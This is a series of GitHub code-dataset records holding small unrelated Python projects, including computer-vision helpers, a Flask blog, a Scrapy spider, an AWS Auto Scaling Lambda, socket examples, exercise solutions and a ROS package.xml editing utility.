for d in D:\n feature[np.argmin(d)] += 1\n for f in feature:\n this_feature.append(f * weight)\n\n this_feature = np.asarray(this_feature).flatten()\n if np.linalg.norm(this_feature) != 0:\n feats[idx] = this_feature / np.linalg.norm(this_feature)\n\n return feats\n\n\ndef getLevelInfo(img, level, depth):\n width = img.shape[0]\n height = img.shape[1]\n weight = 1 / 2 ** (depth - 1)\n if level != 0:\n width = int(width / (2 * level))\n height = int(height / (2 * level))\n weight = 1 / 2 ** (depth - level)\n\n return width, height, weight\n\n\ndef filter_candidate_sift(image_id, candidates_pos, model, threshold, vocab_filename):\n filtered_candidates_pos = []\n\n img = mpimg.imread(join(\"datasets/JPEGImages/{}.jpg\".format(image_id)))\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n for pos in candidates_pos:\n (x, y, w, h) = pos\n x = int(round(x))\n y = int(round(y))\n w = int(round(w))\n h = int(round(h))\n candidate = img[y:y + h, x:x + w]\n\n if any(i < 8 for i in [x, y, w, h]):\n continue\n candidate_feats = bags_of_sifts_spm([candidate], vocab_filename, 3)\n pred = 
model.predict_proba(candidate_feats)[0]\n if pred[0] >= threshold:\n info = [image_id, pred[0]]\n info.extend([x, y, x+w, y+h])\n filtered_candidates_pos.append(info)\n\n return filtered_candidates_pos\n\n\ndef get_res(candidates, candidates_pos, model, vocab_filename=None):\n waldo_list = []\n wenda_list = []\n wizard_list = []\n\n waldo_candidates = []\n wenda_candidates = []\n wizard_candidates = []\n\n import math\n index = 0\n for candidate, pos in zip(candidates, candidates_pos):\n val_image_feat = bags_of_sifts_spm([candidate], vocab_filename, 3)\n y_pred = model.predict(val_image_feat)[0]\n if y_pred == 'waldo':\n waldo_list.append(pos)\n waldo_candidates.append(candidate)\n if y_pred == 'wenda':\n wenda_list.append(pos)\n wenda_candidates.append(candidate)\n if y_pred == 'wizard':\n wizard_list.append(pos)\n wizard_candidates.append(candidate)\n index += 1\n if index % 1000 == 0:\n print(\"res {0}\".format(index))\n return waldo_candidates, waldo_list, wenda_candidates, wenda_list, wizard_candidates, wizard_list\n\n","repo_name":"YShu7/WhereIsWaldo","sub_path":"sift_utils.py","file_name":"sift_utils.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
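+# A minimal end-to-end sketch tying the helpers above together: build the visual
+# vocabulary once, pickle it, then encode images with the spatial pyramid.
+# `train_images` (a list of grayscale arrays) is a hypothetical placeholder.
+vocab = build_vocab(train_images, vocab_size=200)
+with open('vocab.pkl', 'wb') as f:
+    pickle.dump(vocab, f)
+feats = bags_of_sifts_spm(train_images, 'vocab.pkl', depth=3)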
+{"seq_id":"11356019639","text":"\"\"\"\nEjercicio 3: Calculadora de envío\n\nUn minorista en línea proporciona una forma de envío urgente de $ 10.95 para el primer elemento y $ 2.95 para cada segundo elemento posterior. \nEscriba una función que tome el número de elementos en el pedido como su único parámetro. Devuelva los gastos de envío del pedido como resultado de la función. \nIncluya un programa principal que lea la cantidad de artículos comprados al usuario y muestre los gastos de envío.\n\n\"\"\"\ndef calculadora_de_envios(cantidad_articulos):\n\tp1 = 10.95\n\tp2 = 2.95\n\tgastos_envio = p1 + p2 * (cantidad_articulos - 1)\n\treturn gastos_envio \n\n\nprint(\"Bienvendos a mi programa!!\")\n\ncantidad = int(input(\"Ingrese la cantidad de artículos que desea ser enviado\\t\"))\n\nprint(f\"El precio por el envío inmediato es de ${calculadora_de_envios(cantidad)}\")","repo_name":"renzocastro91/Python-Informatorio2022","sub_path":"Funciones/Ej3.py","file_name":"Ej3.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31990054756","text":"import socket\r\nfrom datetime import datetime\r\nimport tkinter as tk\r\n\r\nUDP_PORT = 10006\r\nMESSAGE = \"CTCTime:F:2019.04.30-23:27:00.00:Manual\"\r\nsock = socket.socket(socket.AF_INET, # Internet\r\n socket.SOCK_DGRAM) # UDP\r\n\r\nclass Application:\r\n def __init__(self):\r\n self.window = tk.Tk()\r\n self.window.title(\"ChronoSync\") \r\n \r\n self.txt_ip = tk.Entry(self.window,\r\n justify = tk.CENTER,\r\n width = 25, font = (\"Oswald\", 15))\r\n\r\n self.txt_ip.insert(tk.END, \"172.20.23.98\")\r\n\r\n button_fileData = tk.Button(self.window, fg=\"red\",\r\n text = 'SYNC',\r\n font = (\"Oswald\", 15),\r\n width=25, height=1,\r\n borderwidth = 3,\r\n command = self.send)\r\n self.txt_ip.grid()\r\n button_fileData.grid()\r\n self.window.mainloop()\r\n\r\n def send(self):\r\n UDP_IP = self.txt_ip.get()\r\n now = datetime.now()\r\n dt_string = now.strftime(\"%Y.%m.%d-%H:%M:%S.%f\")[:-4]\r\n MESSAGE = \"CTCTime:F:{}:Manual\".format(dt_string)\r\n sock.sendto(MESSAGE.encode('utf-8'), (UDP_IP, UDP_PORT))\r\n print(MESSAGE)\r\n print(UDP_IP)\r\n\r\napl = Application()\r\n","repo_name":"j-jakub-jankowski/ChronoSync","sub_path":"ChronoSync.py","file_name":"ChronoSync.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31044640809","text":"import json\nimport datetime\nimport time\nimport os\nimport boto3\nimport logging\nfrom botocore.exceptions import ClientError\nfrom copy import error\n\nec2_client = boto3.client('ec2')\nautoscaling = boto3.client('autoscaling')\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef lambda_handler(event, context):\n\n asg_name = event.get('targetASG')\n str_asg = (\" \".join(map(str,asg_name)))\n\n # Trigger Auto Scaling group Instance Refresh\n trigger_auto_scaling_instance_refresh(str_asg)\n return(\"Success\")\n\ndef trigger_auto_scaling_instance_refresh(str_asg, strategy=\"Rolling\",\n min_healthy_percentage=90, instance_warmup=300):\n\n try:\n response = autoscaling.start_instance_refresh(\n AutoScalingGroupName=str_asg,\n Strategy=strategy,\n Preferences={\n 'MinHealthyPercentage': min_healthy_percentage,\n 'InstanceWarmup': instance_warmup\n })\n logging.info(\"Triggered Instance Refresh {} for Auto Scaling \"\n \"group {}\".format(response['InstanceRefreshId'], str_asg))\n \n except ClientError as e:\n logging.error(\"Unable to trigger Instance Refresh for \"\n \"Auto Scaling group {}\".format(str_asg))\n raise e\n","repo_name":"karthik7996/aws-auto-patching","sub_path":"Lambda/instance_refresh.py","file_name":"instance_refresh.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72711954139","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport json\nimport re\nfrom copy import deepcopy\nfrom urllib.parse import unquote\nimport scrapy\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom news.tool.connet_mysql import seach_sql_all\nfrom news.items import NewsItem\nfrom news.tool.handle import datestamptrans\nfrom news.tool.BloomCheck import BloomCheckFunction\n\n\nclass QqSpider(scrapy.Spider):\n name = 'qq'\n allowed_domains = ['qq.com']\n start_urls = [\n 'http://pacaio.match.qq.com/irs/rcd?cid=52&token=8f6b50e1667f130c10f981309e1d8200&ext=3910,3911,3904,3901,3906,3912,3917,3902&page=0']\n\n def __init__(self):\n self.bof = BloomCheckFunction()\n super(QqSpider, self).__init__()\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n\n def spider_closed(self, spider):\n print(\"*\"*50)\n print(\"spider closed\")\n self.bof.save_bloom_file()\n\n\n def start_requests(self):\n headers = {\n 'Referer': 'http://new.qq.com/ch2/licai',\n }\n yield scrapy.Request(\n self.start_urls[0],\n headers=headers,\n callback=self.parse\n )\n\n def parse(self, response):\n res = json.loads(response.body.decode())\n revs = res[\"data\"]\n for rev in revs:\n item = NewsItem()\n item[\"update_date\"] = str(datetime.date.today())\n item['title'] = rev['title']\n # item['postive_score'] = handle_tag(item['title'])\n item['postive_score'] = 0\n update_time = rev['update_time']\n if update_time is not None:\n item['update_time'] = update_time\n item['news_time'] = datestamptrans(item['update_time'])\n item['platform'] = rev['source']\n item['href'] = rev['vurl']\n a_re = re.search(r'\\.html', item['href'])\n if a_re:\n item['href'] = rev['vurl']\n else:\n item['href'] = rev['vurl'][0:-2] + \".html\"\n if item['title'] and self.bof.process_item(item[\"title\"]):\n yield scrapy.Request(\n item['href'],\n callback=self.detail_parse,\n meta={\"item\": deepcopy(item)}\n )\n\n def detail_parse(self, response):\n item = deepcopy(response.meta[\"item\"])\n content = response.xpath(\"string(//div[@class='content-article'])\").extract()\n if len(content) > 0:\n item['content'] = ''.join(''.join(content).split())\n yield item\n\n","repo_name":"arjun-go-go/scrapy_bloomfilter_news","sub_path":"news/news/spiders/qq.py","file_name":"qq.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"1264675694","text":"# This pdf reader reads Arabic properly but has problems when both RTL and LTR languages exist\n# pypdf==3.4.1\nfrom pypdf import PdfReader\n\nreader = PdfReader(\"/mnt/D/Upwork/Ali-UAE/shared_folder_reader/sample_files/sample-arabic.pdf\")\nfull_text = \"\"\nfor page in reader.pages:\n full_text += page.extract_text() + \"\\n\"\nprint(full_text)\n\nwith open('/mnt/D/Upwork/Ali-UAE/shared_folder_reader/arabicpdfreaderout.txt', 'w+') as f:\n f.writelines(full_text)\n\n","repo_name":"esraa-abdelmaksoud/Miscellaneous","sub_path":"pdf_reader_pypdf.py","file_name":"pdf_reader_pypdf.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36748982179","text":"from flask import Flask, render_template, url_for, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nfrom datetime import datetime\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'you-will-never-guess'\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = os.environ.get('DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, 'posts.db')\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\ndb = SQLAlchemy(app)\n\n\nclass BlogPosts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100), nullable=False)\n author = db.Column(db.String(20), nullable=False, default='N/A')\n content = db.Column(db.Text, nullable=False)\n date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n def __repr__(self):\n return 'Blog post ' + str(self.id)\n\n\nclass ContactMe(db.Model):\n # MANUAL TABLE NAME\n __tablename__ = \"ContactMe\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20), nullable=False)\n email = db.Column(db.String(20), nullable=False)\n subject = db.Column(db.String(10), nullable=False)\n message = db.Column(db.Text, nullable=False)\n\n def __init__(self, name, email, subject, message):\n self.name = name\n self.email = email\n self.subject = subject\n self.message = message\n\n def __repr__(self):\n return \"Contacted Me\"\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/posts', methods=[\"GET\", \"POST\"])\ndef posts():\n if request.method == \"POST\":\n post_title = request.form['title']\n post_author = request.form['author']\n post_content = request.form['content']\n new_post = BlogPosts(title=post_title, author=post_author, content=post_content)\n db.session.add(new_post)\n db.session.commit()\n return redirect(\"/posts\")\n else:\n all_posts = BlogPosts.query.all()\n return render_template(\"posts.html\", posts=all_posts)\n\n\n@app.route('/posts/delete/')\ndef delete(id):\n post = BlogPosts.query.get(id)\n db.session.delete(post)\n db.session.commit()\n return redirect(\"/posts\")\n\n\n@app.route('/posts/edit/', methods=[\"GET\", \"POST\"])\ndef edit(id):\n post = BlogPosts.query.get(id)\n\n if request.method == \"POST\":\n post.title = request.form['title']\n post.author = request.form['author']\n post.content = request.form['content']\n db.session.commit()\n return redirect('/posts')\n else:\n return render_template(\"edit.html\", post=post)\n\n\n@app.route('/posts/new', methods=[\"GET\", \"POST\"])\ndef new_posts():\n if request.method == \"POST\":\n post.title = request.form['title']\n post.author = request.form['author']\n post.content = request.form['content']\n new_post = BlogPosts(title=post_title, author=post_author, content=post_content)\n db.session.add(new_post)\n db.session.commit()\n return redirect('/posts')\n else:\n return render_template(\"new_posts.html\")\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\n@app.route('/skills')\ndef skills():\n return render_template('skills.html')\n\n\n@app.route('/contact', methods=[\"GET\", \"POST\"])\ndef contact():\n if request.method == \"POST\":\n name = request.form.get('name')\n email = request.form.get('email')\n subject = request.form.get('subject')\n message = request.form.get('message')\n contact_message = ContactMe(name, email, subject, message)\n db.session.add(contact_message)\n db.session.commit()\n return redirect('contact.html')\n\n return 
render_template('contact.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"hibenca/Health-and-Technology-Website","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
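+The blog app above defines its models but never creates the tables. With Flask-SQLAlchemy the tables are typically created once before the first run; a minimal sketch, assuming the module is importable as app:
+
+from app import app, db
+
+with app.app_context():
+    db.create_all()  # creates posts.db with the BlogPosts and ContactMe tables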
+{"seq_id":"17880343020","text":"class Character(object):\n def __init__(self, id, name, **details):\n self._id = id\n self._details = details\n self.name = name.strip()\n self.fill(**self._details)\n\n def fill(self, **details):\n self.url = details['resourceURI']\n self.description = details['description']\n self.detail_url = [url for url in details['urls'] if url['type'] == 'detail']\n self.comics = [Comic(comic['name']) for comic in details['comics']['items']]\n self.series = []\n self.stories = []\n self.events = []\n\n\nclass Comic(object):\n def __init__(self, title):\n self.title = title\n","repo_name":"kennethlove/marvelwrapper","sub_path":"marvel/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"35944763634","text":"\"\"\"\n Name: Nnamdi Ajoku\n Language: Python3\n\n Description: Given an array of integers nums containing\n \n n + 1 integers where each integer is in the range [1, n] inclusive.\n\n There is only one repeated number in nums, return this repeated number.\n\n You must solve the problem without modifying the array nums and uses only\n \n constant extra space.\n\n \n\n\"\"\"\ndef findDuplicate(nums):\n track = {}\n \n for i in range(len(nums)):\n if nums[i] not in track:\n track[nums[i]] = nums[i]\n else:\n return nums[i]","repo_name":"ajaycmput/LeetCode_Solved","sub_path":"DuplicateNumber/soln.py","file_name":"soln.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8502395133","text":"def solution(a):\n answer = 0\n x, y = ord(a[0])-96, int(a[1])\n\n dx = [-1, 1, -1, 1, -2, 2, -2, 2]\n dy = [-2, -2, 2, 2, -1, -1, 1, 1]\n for i in range(8):\n if x+dx[i] > 0 and x+dx[i] < 9 and y+dy[i] > 0 and y+dy[i] < 9 :\n answer += 1\n return answer\n\nprint(solution(\"a1\")) # 2\nprint(solution(\"h3\")) # 4","repo_name":"skill-trees/Algorithm","sub_path":"13주차/0328/왕실의 나이트_ssuh0o0.py","file_name":"왕실의 나이트_ssuh0o0.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"73189864220","text":"from socket import *\n\nlocalhost = \"127.0.0.1\"\nport = 43210\nobj_socket = socket(AF_INET, SOCK_DGRAM)\nobj_socket.bind((localhost, port))\nprint(\"Server ready...\")\nwhile True:\n data, origin = obj_socket.recvfrom(65535)\n print(\"Origin..........: \", origin)\n print(\"Received data: \", data.decode())\n answer = input(\"Enter the answer: \")\n obj_socket.sendto(answer.encode(), origin)\nobj_socket.close()\n","repo_name":"jonasmzsouza/python-nano-course","sub_path":"12Socket/UDPServer.py","file_name":"UDPServer.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"71417241501","text":"import string\ndef de_punctuation(line):\n for e in string.punctuation:\n if e in line:\n line=line.replace(e,\" \")\n return line\ndef repeating_words(l):\n d={}\n for word in l:\n if word in d:\n d[word]+=1\n else:\n d[word]=1\n return d\n\ndef opening_file(myfile):\n c=0\n l1=[]\n for line in myfile:\n line=line.strip(string.whitespace+string.punctuation)\n line=de_punctuation(line)\n for word in line.split():\n l1.append(word.lower())\n c=c+1\n #print(l1)\n print(c)\n return repeating_words(l1)\n\n\n\nmyfile=open(\"58771-0.txt\")\nt=opening_file(myfile)\nresult=list(t.keys())\nfor i in range(20):\n print(result[i])\n\n","repo_name":"inwk6312winter2019/week4labsubmissions-khyathinalluri","sub_path":"4task3.py","file_name":"4task3.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20430697049","text":"# 进程的创建 create process\n# LINUX 系统在os模块下的fork函数\nfrom multiprocessing import Process\nfrom time import sleep\nimport os\n\n\n# 自定义进程\nclass Myprocess(Process):\n def __init__(self, name):\n super(Myprocess,self).__init__()\n self.name = name\n\n\n# 重写run方法\n def run(self):\n n = 1\n while True:\n sleep(1)\n # print (\"进程名:\",self.name)\n print(\"{}---------》自定义进程{}\".format(n, self.name))\n n += 1\n\n\nif __name__ == '__main__':\n p = Myprocess(name='小明')\n p.start()\n p1 = Myprocess(name='小红')\n p1.start()\n","repo_name":"Howardhuang98/Blog","sub_path":"demos/python_learning/进程与线程2.py","file_name":"进程与线程2.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72108916379","text":"# space = O(1), time = O(n^2)\ndef firstDuplicateValue(array):\n min_inx_of_sec_duplicate = len(array)\n for i in range(len(array)):\n value = array[i]\n for j in range( i+1, len(array)):\n value_to_compare = array[j]\n if value == value_to_compare:\n min_inx_of_sec_duplicate = min(min_inx_of_sec_duplicate,j) # replaced by the closest the number to current if, if the original value is larger, it would not be replaced.\n if min_inx_of_sec_duplicate == len(array):\n return -1\n return array[min_inx_of_sec_duplicate]\n\narray =[2, 1, 5, 2, 3, 3, 4]\nprint(firstDuplicateValue(array))\n\n","repo_name":"jolliebonnie/training_projects","sub_path":"array/first duplicates/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36175727041","text":"import numpy as np\r\nimport pandas as pd\r\nfrom tensorflow import keras\r\nfrom keras.layers import BatchNormalization\r\nimport tensorflow as tf\r\n\r\ndataset = pd.read_csv('Dataset_with_fall.csv')\r\ndataset = dataset.drop(['user','Magnetometer_X','Magnetometer_Y','Magnetometer_Z', 'Gyroscope_X','Gyroscope_Y','Gyroscope_Z'], axis=1)\r\nx = dataset.iloc[:, :-1].values\r\ny = dataset.iloc[:, -1].values\r\n# print(dataset.head())\r\n\r\ny_training = np.array(y[0:len(y)-21])\r\nx_training = []\r\nfor i in range(len(x)-21):\r\n x_tr = []\r\n for j in range(i,i+21):\r\n for k in range(6):\r\n x_tr.append(x[j][k])\r\n x_training.append(x_tr)\r\n\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nHotEncode = OneHotEncoder()\r\ny = HotEncode.fit_transform(y.reshape(9396,1)).toarray()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.25, random_state = 3)\r\n\r\n# x_train, x_validation, y_train, y_validation = train_test_split(x_train, y_train, test_size = 0.2, random_state = 1)\r\nx_train = tf.expand_dims(x_train, axis=2)\r\n# x_validation = tf.expand_dims(x_validation, axis=2)\r\n# y_train = tf.expand_dims(y_train, axis=2)\r\n# y_validation = tf.expand_dims(y_validation, axis=2)\r\nx_test = tf.expand_dims(x_test, axis=2)\r\n# y_test = tf.expand_dims(y_test, axis=2)\r\n\r\ndef build_model():\r\n model = tf.keras.Sequential()\r\n activation = 'relu'\r\n model.add(keras.layers.LSTM(units=128, input_dim=3, input_shape = (x_train.shape[1:]), activation=activation, return_sequences=True))\r\n model.add(keras.layers.Dropout(0.2))\r\n model.add(BatchNormalization())\r\n model.add(keras.layers.LSTM(units=128, activation=activation))\r\n model.add(keras.layers.Dropout(0.2))\r\n model.add(BatchNormalization())\r\n model.add(keras.layers.Dense(units=32, activation=activation))\r\n model.add(BatchNormalization())\r\n model.add(keras.layers.Dropout(0.3))\r\n model.add(keras.layers.Dense(units=7, activation='softmax'))\r\n return model\r\n\r\n\r\nclass myCallback(keras.callbacks.Callback):\r\n def on_epoch_end(self, epoch, logs={}):\r\n if logs.get('val_accuracy') >= 0.92 and logs.get('accuracy') >= 0.98:\r\n self.model.stop_training = True\r\n print(\"\\nReached 98% accuracy so cancelling training!\") \r\n\r\n\r\ncallbacks = myCallback()\r\n\r\nmodel = build_model()\r\nmodel.compile(optimizer=tf.optimizers.Adam(decay=1e-5,learning_rate=1e-3), loss='mse', metrics=['accuracy'])\r\nmodel.fit(x_train, y_train, epochs=1200, callbacks=[callbacks],validation_data=(x_test, y_test))\r\nprint(model.summary())\r\nprint(model.evaluate(x_test, y_test))\r\nprint(model.metrics_names)\r\n\r\n# for i in range(0,15):\r\n# print(HotEncode.inverse_transform(model.predict(np.array([x_test[i,:]]))))\r\n\r\n# print(y_test[0:15,:])\r\n\r\n","repo_name":"vishalsingh17-web2/IoT-domain","sub_path":"ML & DL Models/rnn_fall.py","file_name":"rnn_fall.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19376609717","text":"class Solution:\n\n def isPalindrome(self, x: int) -> bool:\n my_int = x\n int_String = str(my_int)\n int_length = len(int_String)\n list = [int(x) for x in str(my_int)]\n i = 0\n p = 0\n q = int_length-1\n while i < int_length:\n if list[p] == list[q]:\n truth_Value = True\n p = p + 1\n q = q - 1\n i = i+1\n elif x == 0:\n truth_Value = True\n else:\n truth_Value = False\n i = i+1\n\n print(truth_Value)\n\n\na = Solution()\na.isPalindrome(0)\n\n\n\n\n","repo_name":"lcswnn/CS331_Python_Assignment_1","sub_path":"Palindrome Number.py","file_name":"Palindrome Number.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4381672846","text":"import collections\nimport operator\nimport re\nfrom xml.dom.minidom import parse\n\nDEPEND_ORDERING = ['buildtool_depend', 'depend', 'build_depend', 'build_export_depend',\n 'run_depend', 'exec_depend', 'test_depend', 'doc_depend']\n\nORDERING = ['name', 'version', 'description',\n ['maintainer', 'license', 'author', 'url']] + DEPEND_ORDERING + ['export']\n\nINDENT_PATTERN = re.compile('\\n *')\n\nPEOPLE_TAGS = ['maintainer', 'author']\n\nBUILD_TYPES = {'catkin', 'cmake'}\n\nFORMAT_3_HEADER = \"\"\"\n\n\"\"\"\n\n\ndef get_ordering_index(name, whiny=True):\n for i, o in enumerate(ORDERING):\n if type(o) == list:\n if name in o:\n return i\n elif name == o:\n return i\n if name and whiny:\n print('\\tUnsure of ordering for ' + name)\n return len(ORDERING)\n\n\ndef get_package_tag_index(s, key='= 2 and mode != 'test':\n keys.append('depend')\n if mode == 'run':\n keys.append('exec_depend')\n if mode == 'test':\n keys.append('test_depend')\n pkgs = []\n for key in keys:\n pkgs += self.get_packages_by_tag(key)\n return set(pkgs)\n\n def get_tab_element(self, tabs=1):\n return self.tree.createTextNode('\\n' + ' ' * (self.std_tab * tabs))\n\n def get_child_indexes(self):\n \"\"\"Return a dictionary based on which children span which indexes.\n\n The keys are the types of nodes in the xml (build_depend, maintainer, etc).\n The values are arrays marking the range of elements in the xml root that match that tag.\n\n For example, tags[build_depend] = [(5, 9), (11, 50)] means that elements [5, 9) and [11, 50) are\n either build_depend elements (or the strings between them)\n \"\"\"\n tags = collections.defaultdict(list)\n i = 0\n current = None\n current_start = 0\n current_last = 0\n while i < len(self.root.childNodes):\n child = self.root.childNodes[i]\n if child.nodeType == child.TEXT_NODE:\n i += 1\n continue\n\n name = child.nodeName\n if name != current:\n if current:\n tags[current].append((current_start, current_last))\n current_start = i\n current = name\n current_last = i\n i += 1\n if current:\n tags[current].append((current_start, current_last))\n return dict(tags)\n\n def get_insertion_index(self, tag, tag_value=None):\n \"\"\"Return the index where to insert a new element with the given tag type.\n\n If there are already elements of that type, then either insert after the last matching element,\n or if the list is alphabetized, insert it in the correct place alphabetically using the tag_value.\n Otherwise, look at the existing elements, and find ones that are supposed to come the closest\n before the given tag, and insert after them. 
If none found, add at the end.\n \"\"\"\n indexes = self.get_child_indexes()\n # If there are elements of this type already\n if tag in indexes:\n if len(indexes[tag]) == 1 and tag in DEPEND_ORDERING:\n start, end = indexes[tag][0]\n tag_values = []\n my_index = start\n for i in range(start, end + 1):\n child = self.root.childNodes[i]\n if child.nodeType == child.TEXT_NODE:\n continue\n value = child.firstChild.data\n tag_values.append(value)\n if tag_value >= value:\n my_index = i\n\n # If already sorted, and first_value is defined (meaning there are existing tags)\n if tag_values and sorted(tag_values) == tag_values:\n # If it should go before the current first tag, we XXX\n if tag_value <= tag_values[0]:\n return my_index - 1\n\n # If it should go before some existing tag\n if tag_value <= tag_values[-1]:\n return my_index\n\n # If all else fails, we insert the tag after the last matching tag\n return indexes[tag][-1][1] # last match, end index\n\n # If no elements match this type, then find the right place to insert\n else:\n max_index = get_ordering_index(tag, whiny=False)\n best_tag = None\n best_index = None\n for tag in indexes:\n ni = get_ordering_index(tag, whiny=False)\n if ni >= max_index:\n # This tag should appear after our tag\n continue\n\n if best_tag is None or ni > best_index or indexes[tag][-1] > indexes[best_tag][-1]:\n best_tag = tag\n best_index = ni\n\n if best_tag is None:\n return len(self.root.childNodes)\n else:\n return indexes[best_tag][-1][1]\n\n def insert_new_tag(self, tag):\n if tag.tagName in DEPEND_ORDERING:\n value = tag.firstChild.data\n else:\n value = None\n\n index = self.get_insertion_index(tag.tagName, value)\n before = self.root.childNodes[:index + 1]\n after = self.root.childNodes[index + 1:]\n\n new_tab_element = self.get_tab_element()\n\n # if the tag immediately before where we're going to insert is a text node,\n # then insert the new element and then the tab\n if before and before[-1].nodeType == before[-1].TEXT_NODE:\n new_bits = [tag, new_tab_element]\n else:\n # Otherwise (i.e. 
most cases) insert the tab then the element\n new_bits = [new_tab_element, tag]\n\n self.root.childNodes = before + new_bits + after\n self.changed = True\n\n def insert_new_tags(self, tags):\n for tag in tags:\n self.insert_new_tag(tag)\n\n def insert_new_tag_inside_another(self, parent, tag, depth=2):\n all_elements = []\n all_elements.append(self.get_tab_element(depth))\n all_elements.append(tag)\n\n if len(parent.childNodes) == 0:\n parent.childNodes = all_elements + [self.get_tab_element()]\n else:\n parent.childNodes = parent.childNodes[:-1] + all_elements + parent.childNodes[-1:]\n self.changed = True\n\n def insert_new_packages(self, tag, values):\n for pkg in sorted(values):\n print('\\tInserting %s: %s' % (tag, pkg))\n node = self.tree.createElement(tag)\n node.appendChild(self.tree.createTextNode(pkg))\n self.insert_new_tag(node)\n\n def add_packages(self, build_depends, run_depends, test_depends=None, prefer_depend_tag=True):\n if self.format == 1:\n run_depends.update(build_depends)\n existing_build = self.get_packages('build')\n existing_run = self.get_packages('run')\n build_depends = build_depends - existing_build\n run_depends = run_depends - existing_run\n if self.format == 1:\n self.insert_new_packages('build_depend', build_depends)\n self.insert_new_packages('run_depend', run_depends)\n elif prefer_depend_tag:\n depend_tags = build_depends.union(run_depends)\n\n # Remove tags that overlap with new depends\n self.remove_dependencies('build_depend', existing_build.intersection(depend_tags))\n self.remove_dependencies('exec_depend', existing_run.intersection(depend_tags))\n\n # Insert depends\n self.insert_new_packages('depend', depend_tags)\n else:\n both = build_depends.intersection(run_depends)\n self.insert_new_packages('depend', both)\n self.insert_new_packages('build_depend', build_depends - both)\n self.insert_new_packages('exec_depend', build_depends - both - existing_run)\n self.insert_new_packages('exec_depend', run_depends - both)\n\n if test_depends is not None and len(test_depends) > 0:\n existing_test = self.get_packages('test')\n test_depends = set(test_depends) - existing_build - build_depends - existing_test\n self.insert_new_packages('test_depend', test_depends)\n\n def remove_element(self, element):\n \"\"\"Remove the given element AND the text element before it if it is just an indentation.\"\"\"\n parent = element.parentNode\n index = parent.childNodes.index(element)\n if index > 0:\n previous = parent.childNodes[index - 1]\n if previous.nodeType == previous.TEXT_NODE and INDENT_PATTERN.match(previous.nodeValue):\n parent.removeChild(previous)\n parent.removeChild(element)\n self.changed = True\n\n def remove_dependencies(self, name, pkgs, quiet=False):\n for el in self.root.getElementsByTagName(name):\n pkg = el.childNodes[0].nodeValue\n if pkg in pkgs:\n if not quiet:\n print('\\tRemoving %s %s' % (name, pkg))\n self.remove_element(el)\n\n def get_elements_by_tags(self, tags):\n elements = []\n for tag in tags:\n elements += self.root.getElementsByTagName(tag)\n return elements\n\n def get_people(self):\n people = []\n for el in self.get_elements_by_tags(PEOPLE_TAGS):\n name = el.childNodes[0].nodeValue\n email = el.getAttribute('email')\n people.append((name, email))\n return people\n\n def update_people(self, target_name, target_email=None, search_name=None, search_email=None):\n for el in self.get_elements_by_tags(PEOPLE_TAGS):\n name = el.childNodes[0].nodeValue\n email = el.getAttribute('email') if el.hasAttribute('email') else ''\n if 
